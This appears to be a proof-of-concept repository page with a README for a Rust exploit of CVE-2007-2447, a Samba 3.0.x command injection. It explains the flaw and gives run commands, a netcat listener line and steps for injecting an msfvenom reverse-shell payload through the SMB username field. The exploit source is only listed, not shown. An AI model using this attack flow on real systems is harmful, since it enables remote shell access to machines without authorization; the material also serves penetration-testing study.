来源

关联漏洞

描述

A Rust implementation of the CVE-2007-2447 exploit targeting Samba smbd 3.0.20-Debian.

介绍

# CVE-2007-2447 Samba Exploit

A Rust implementation of the CVE-2007-2447 exploit targeting Samba smbd 3.0.20-Debian.

## Vulnerability Description

CVE-2007-2447 is a command injection vulnerability in Samba versions 3.0.0 through 3.0.25rc3. The vulnerability exists in the `SamrChangePassword()` function, which fails to properly sanitize user input, allowing attackers to execute arbitrary commands via shell metacharacters in the username field during SMB authentication.

## Prerequisites

- Rust installed on your system
- `msfvenom` (part of Metasploit Framework)
- Target running vulnerable Samba version

## Usage

```bash
cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>
```

### Example

```bash
# Set up a netcat listener
nc -lvnp 4444

# Run the exploit
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100
```

## Options

- `--lhost`: Your attacking machine's IP address
- `--lport`: Port to receive the reverse shell connection
- `--target`: Target machine's IP address

## How it Works

1. Generates a reverse netcat payload using msfvenom
2. Injects the payload into the SMB username field using backticks
3. Sends a malformed SMB Session Setup request to port 445
4. Exploits command injection in Samba's username processing
5. Executes the reverse shell payload on the target

## Disclaimer

This tool is for educational and authorized penetration testing purposes only. Use responsibly and only on systems you own or have explicit permission to

文件快照

 [4.0K]  /data/pocs/d2c9dd04d390670842d2403952c0a42bb6b0bc0a
├── [3.0K]  Cargo.lock
├── [  97]  Cargo.toml
├── [1.5K]  README.md
└── [4.0K]  src
    └── [5.7K]  main.rs

1 directory, 4 files

备注